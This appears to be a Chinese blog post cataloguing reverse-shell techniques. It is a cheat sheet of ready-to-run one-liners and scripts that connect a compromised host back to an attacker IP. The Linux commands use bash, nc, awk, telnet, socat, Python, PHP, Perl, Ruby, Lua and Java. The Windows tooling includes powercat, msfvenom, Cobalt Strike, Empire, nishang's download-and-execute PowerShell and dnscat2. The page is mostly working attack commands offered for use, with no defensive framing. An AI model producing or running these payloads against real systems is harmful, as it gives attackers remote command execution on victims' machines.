• 反弹shell的各种姿势


    一、Linux反弹shell

      姿势1 bash反弹

        bash -i >& /dev/tcp/192.168.99.242/1234 0>&1
        base64版:bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljk5LjI0Mi8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}'
        在线编码地址:http://www.jackson-t.ca/runtime-exec-payloads.html

     其他版本 
        exec 5<>/dev/tcp/192.168.99.242/1234;cat <&5 | while read line; do $line 2>&5 >&5;done
        exec /bin/sh 0</dev/tcp/192.168.99.242/1234 1>&0 2>&0
     姿势2 nc反弹

        
    nc -e /bin/bash 192.168.99.242 1234 

    姿势3 awk反弹

      
    awk 'BEGIN{s="/inet/tcp/0/192.168.99.242/1234";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'

      
    姿势4 telnet反弹

      
    备注:需要在攻击机上分别监听1234和4321端口,执行反弹shell命令后,在1234终端输入命令,4321查看命令执行结果
      telnet 192.168.99.242 1234 | /bin/bash | telnet 192.168.99.242 4321

    姿势5 socat反弹
      
      
    socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.99.242:1234

    姿势6 Python反弹
      
      
    python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.99.242',1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

    姿势7 PHP反弹

      
    php -r '$sock=fsockopen("192.168.99.242",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

    姿势8 Perl反弹

      
    perl -e 'use Socket;$i="192.168.99.242";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

    姿势9 Ruby反弹

      
    ruby -rsocket -e'f=TCPSocket.open("192.168.99.242",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

    姿势10 Lua反弹

      
    lua -e "require('socket');require('os');t=socket.tcp();t:connect('192.168.99.242','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"

    姿势11 java反弹

      
    public class Revs {    
    /**
    * @param args * @throws Exception */
    public static void main(String[] args) throws Exception {
    // TODO Auto-generated method stub
    Runtime r = Runtime.getRuntime();
    String cmd[]= {"/bin/bash","-c","exec 5<>/dev/tcp/192.168.99.242/1234;cat <&5 | while read line; do $line 2>&5 >&5; done"};
    Process p = r.exec(cmd);
    p.waitFor();
    }
    }
    保存为Revs.java文件,编译执行
    javac Revs.java
    java Revs
    二、Windows反弹shell
      姿势1 nc反弹

          
    netcat 下载:https://eternallybored.org/misc/netcat/
          
    服务端反弹:nc 192.168.99.242 1234 -e c:windowssystem32cmd.exe
        
        姿势2 powershell反弹
          
          pwoercat是netcat的powershell版本,功能免杀性都要比netcat好用的多。
          netcat 下载:https://eternallybored.org/misc/netcat/服务端反弹:nc 192.168.99.242 1234 -e c:windowssystem32cmd.exe
          下载到目标机器本地执行
          
    PS C:WWW> Import-Module ./powercat.ps1
           PS C:WWW> powercat -c 192.168.99.242 -p 1234 -e cmd
        
        姿势3 MSF反弹shell
          
         
    使用msfvenom生成相关payload
          msfvenom -l payloads | grep ‘cmd/windows/reverse’
          msfvenom -p cmd/windows/reverse_powershell LHOST=192.168.99.242 LPORT=1234

        姿势4 CobalStrike反弹shell 
          1、配置监听器:点击Cobalt Strike——>Listeners——>在下方Tab菜单Listeners,点击add。
          2、生成payload:点击Attacks——>Packages——>Windows Executable,保存文件位置。
          3、目标机执行powershell payload

        
        姿势5 Empire反弹shell  
          usestager windows/launcher_vbs
          info
          set Listener test
          
    execute

        姿势6 nishang反弹shell

         
    Reverse TCP shell:
          powershell IEX (New-
    Object Net.WebClient).DownloadString('https://raw.githubusercontent.com /samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress 10.1.1.210 -port 1234
       
      
         Reverse UDP shell:

          powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellUdp.ps1');
          
    Invoke-PowerShellUdp -Reverse -IPAddress 10.1.1.210 -port 1234
     
      
       姿势7 Dnscat反弹shell
          
         
    github地址:
            https://github.com/iagox86/dnscat2
         服务端:
          ruby dnscat2.rb --dns "domain=lltest.com,host=xx.xx.xx.xx" --no-cache -e open -e open
         
         目标主机:
          powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/master/dnscat2.ps1');Start-Dnscat2 -Domain lltest.com -DNSServer xx.xx.xx.xx

    勿做伸手党,勤思考,总能成就一番事业。
  • 相关阅读:
    Centos 8 部署harbor 访问502
    selenium学习记录
    shell基础
    抓取人民日报
    caffe在笔记本ubuntu10.04 64位下的无GPU安装
    【转】HMM
    typedef 的一些用法
    j2ee 使用tomcat开发网站需要访问中文名的资源遇到的问题解决方案。。
    解决lex.yy.c文件在vs2012下编译生成exe
    python学习
  • 原文地址:https://www.cnblogs.com/X-caiji/p/13495191.html
Copyright © 2020-2023  润新知